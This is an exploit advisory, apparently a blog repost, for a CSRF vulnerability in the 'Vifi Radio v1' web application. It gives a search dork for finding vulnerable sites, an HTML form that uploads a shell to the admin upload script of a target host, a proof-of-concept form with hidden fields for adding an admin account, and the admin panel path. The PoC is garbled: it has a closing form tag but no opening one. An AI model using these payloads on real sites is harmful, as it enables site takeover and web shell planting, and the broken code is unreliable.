Vifi Radio v1 - CSRF Vulnerability
############################################################~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~Web App. : Vifi Radio|~Affected Version : v1|~Software : http://scriptim.org/market-item/vifi-v1-radyo-scripti/ & http://vifibilisim.com/scriptlerimiz-29-Radyo_Siteleri_Icin_Script.html |~Official Demo : http://radyo.vifibilisim.com|~RISK : Medium|~DORK : inurl:index.asp?radyo=2|~Tested On : [L] Windows 7, Mozilla Firefox########################################################
Upload.HTML
-----------------------------------------------------------
<td width="796" valign="top"><form name="form1" method="post" action="http://[TARGET]/yonetim/djtek_yukle.asp?upload=true&haber=56" enctype="multipart/form-data" onSubmit="checkFileUpload(this,'GIF,JPG,JPEG,BMP,PNG');return document.MM_returnValue">
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td class="baslik"> CSRF with Tamper Data Shell Upload PoC </td>
</tr> <tr>
<td height="125" align="center" class="menu"><input type="file" name="fmfile" style="width:200px" class="main">
<input name="fmsubmit" type="submit" class="main" value="YÜKLE" /></td>
</tr></table></form></td></tr></table></td></tr>
----------------------------------------------------------
PoC
----------------------------------------------------------
<html>
<body>
<input type="hidden" name="rutbe" value="1" />
<input type="hidden" name="djadi" value="0" />
<input type="hidden" name="resim" value="Vifi+Bili%FEim" />
<input type="hidden" name="firma" value="USERNAME" />
<input type="hidden" name="link" value="PASSWORD" />
<input type="hidden" name="sira" value="23" />
<input type="hidden" name="ilet" value="G%D6NDER" />
<input type="hidden" name="Submit" value="Exploit!" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
############################
"Admin Panel: /yonetim "
############################
EXPLOIT: http://0day.today/exploit/24101
ليست هناك تعليقات:
إرسال تعليق